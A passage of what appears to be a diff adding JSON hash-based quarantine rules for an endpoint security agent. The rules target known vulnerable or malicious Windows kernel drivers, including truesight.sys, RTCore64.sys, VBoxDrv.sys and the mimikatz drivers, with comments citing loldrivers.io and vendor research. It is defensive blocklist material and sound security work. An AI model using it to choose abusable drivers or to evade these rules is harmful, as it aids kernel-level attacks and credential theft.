+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.454036Z",
+ "creation_date": "2026-03-23T11:45:30.454039Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.454048Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0eab16c7f54b61620277977f8c332737081a46bc6bbde50742b6904bdd54f502",
+ "comment": "Vulnerable Kernel Driver (aka sandra.sys) [https://www.loldrivers.io/drivers/bc5e020a-ecff-43c8-b57b-ee17b5f65b21/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ae12a09f-49b3-5257-af6a-3cf87530f738",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.829202Z",
+ "creation_date": "2026-03-23T11:45:30.829204Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.829209Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "341112cb43a877160f2c2b49c815e00d2069dbd3d7151660c1bd7aa0a48798de",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ae1fcc51-187e-5984-8bdb-f96e64c33ed9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.817304Z",
+ "creation_date": "2026-03-23T11:45:31.817306Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.817311Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a7fd5ee391257e27e9f62cba119818229e873fe4ac1ff3d8ce58ceb461cd3679",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ae29637f-c982-56f5-844e-863e2ccfa65a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.835910Z",
+ "creation_date": "2026-03-23T11:45:30.835912Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.835918Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d60c23bb3d66311291cf83fd65a368d7633138123d3128e5c7102f5dbc810603",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ae2e71ba-7048-5943-94ab-52026fb9fcd8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.477290Z",
+ "creation_date": "2026-03-23T11:45:30.477293Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.477302Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0dc4ff96d7e7db696e0391c5a1dda92a0b0aedbf1b0535bf5d62ebeec5b2311c",
+ "comment": "Vulnerable Kernel Driver (aka elbycdio.sys) [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ae34fd73-6596-5769-9458-9605fa08ca8a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.825132Z",
+ "creation_date": "2026-03-23T11:45:30.825136Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.825146Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "453ebab8125afc45e99d961bdd0471e6ac75d17636d8a07f5b1ec50a2e6c7ee7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ae3cf975-c2ac-58b3-a54a-9a37ac42cf65",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.608631Z",
+ "creation_date": "2026-03-23T11:45:29.608633Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.608638Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c5bd7563d8f97c73577cc0e90b5f7b7764940250067bf4cf6e739d27ffd26a5b",
+ "comment": "VirtualBox VBoxDrv vulnerable driver (aka VBoxDrv.sys) [CVE-2008-3431] [https://www.loldrivers.io/drivers/79542852-3a0c-43bc-bfa3-3eeb0e1d7fd2/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ae47271a-4399-5cd6-98cb-b9b7f4d4d151",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.141121Z",
+ "creation_date": "2026-03-23T11:45:31.141123Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.141129Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d4e4ec99d8c460bbe7a13c1e8ff54dedcbf45b6fbd204eb6a628c25933d8f2b5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ae48bbea-c71b-5880-a655-221694433305",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.462199Z",
+ "creation_date": "2026-03-23T11:45:30.462203Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.462211Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "82fea578188662b4ed6df4c3aaaf6ebae72a6cd2f8bf135a89150cca1769156b",
+ "comment": "Malicious Kernel Driver (aka mimikatz.sys) [https://www.loldrivers.io/drivers/14556074-b235-4378-b356-f58721629d72/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ae526818-b10c-57db-aec5-d7946e11b165",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.818213Z",
+ "creation_date": "2026-03-23T11:45:31.818216Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.818224Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "557df7d5121ad120c2969b470757e44291abc2bdd2e3b0c60772d5c5f1bc23c2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ae596425-e3e7-5329-8a5c-5641c3e37ede",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.830257Z",
+ "creation_date": "2026-03-23T11:45:31.830259Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.830264Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "429f5d277168ca8c967b1502381190fbaa147707feb6ff580a371fe29045337a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ae5e89b9-4a3c-50ad-a710-2655ba969617",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.460408Z",
+ "creation_date": "2026-03-23T11:45:30.460411Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.460420Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "54bf602a6f1baaec5809a630a5c33f76f1c3147e4b05cecf17b96a93b1d41dca",
+ "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ae827a04-2ff5-58fa-bbec-8574e2dfef4e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.469486Z",
+ "creation_date": "2026-03-23T11:45:30.469489Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.469498Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "374bb09b4d6a9f21a5e2320343068bd44848f396d9b25a6f4d80931e6d9505ce",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ae830a4f-c9dc-5d2a-b666-054bde0122bb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.491369Z",
+ "creation_date": "2026-03-23T11:45:31.491372Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.491380Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "97445ce282a3f1fa81f60aad2897c04627510fe8aabf82bae7dab7c3557bccec",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ae86594e-5289-5edf-852f-c361582b9f21",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.967567Z",
+ "creation_date": "2026-03-23T11:45:29.967569Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.967575Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f83c357106a7d1d055b5cb75c8414aa3219354deb16ae9ee7efe8ee4c8c670ca",
+ "comment": "Retliften malicious signed drivers (aka netfilter.sys) [https://msrc-blog.microsoft.com/2021/06/25/investigating-and-mitigating-malicious-drivers/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ae876ee6-441e-545d-81e3-9eba6c401dac",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.150461Z",
+ "creation_date": "2026-03-23T11:45:31.150463Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.150468Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fe1f8fbbcc623adace57f324e95ba90c3d31180dda932e84bcb6172da78af133",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ae8beed8-1877-5929-976b-19aeda4277d5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.477516Z",
+ "creation_date": "2026-03-23T11:45:31.477519Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.477529Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4fe85d8e2dc09a022c6c2a2f3cba4c656bf74785a896de052b60c67fa3ba55b0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ae907d59-39c2-5da8-ba3c-b4dfeb5d1420",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.608103Z",
+ "creation_date": "2026-03-23T11:45:29.608105Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.608110Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cf3a7d4285d65bf8688215407bce1b51d7c6b22497f09021f0fce31cbeb78986",
+ "comment": "VirtualBox VBoxDrv vulnerable driver (aka VBoxDrv.sys) [CVE-2008-3431] [https://www.loldrivers.io/drivers/79542852-3a0c-43bc-bfa3-3eeb0e1d7fd2/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "ae98a251-5578-5348-b099-c2ecb176884e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.610794Z",
+ "creation_date": "2026-03-23T11:45:29.610796Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.610801Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dbb457ae1bd07a945a1466ce4a206c625e590aee3922fa7d86fbe956beccfc98",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "aeb7583e-f49d-5838-868f-ae10be7abc2f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.604699Z",
+ "creation_date": "2026-03-23T11:45:29.604701Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.604707Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "de6bf572d39e2611773e7a01f0388f84fb25da6cba2f1f8b9b36ffba467de6fa",
+ "comment": "Vulnerable Kernel Driver (aka netfilter2.sys) [https://www.loldrivers.io/drivers/5ad8a3b6-6d20-4c95-8fa7-9a507167ba3c/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "aec922b7-116e-5c07-9413-eea77b1a5cf9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.818465Z",
+ "creation_date": "2026-03-23T11:45:31.818468Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.818478Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a079dc1a975c5ec4aa199a683917e83aa919f60d0fa4a2db2964fab0c79949bb",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "aed057d0-78e2-5a96-8df2-66378a4cc35a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.826207Z",
+ "creation_date": "2026-03-23T11:45:30.826209Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.826215Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3438e79b93d2a31d2da9a18a806cf3baaf0e75ae238cad04e3013e7e546256f1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "aee014f5-8d4f-5fe2-9763-451b59aac9ce",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.470490Z",
+ "creation_date": "2026-03-23T11:45:30.470494Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
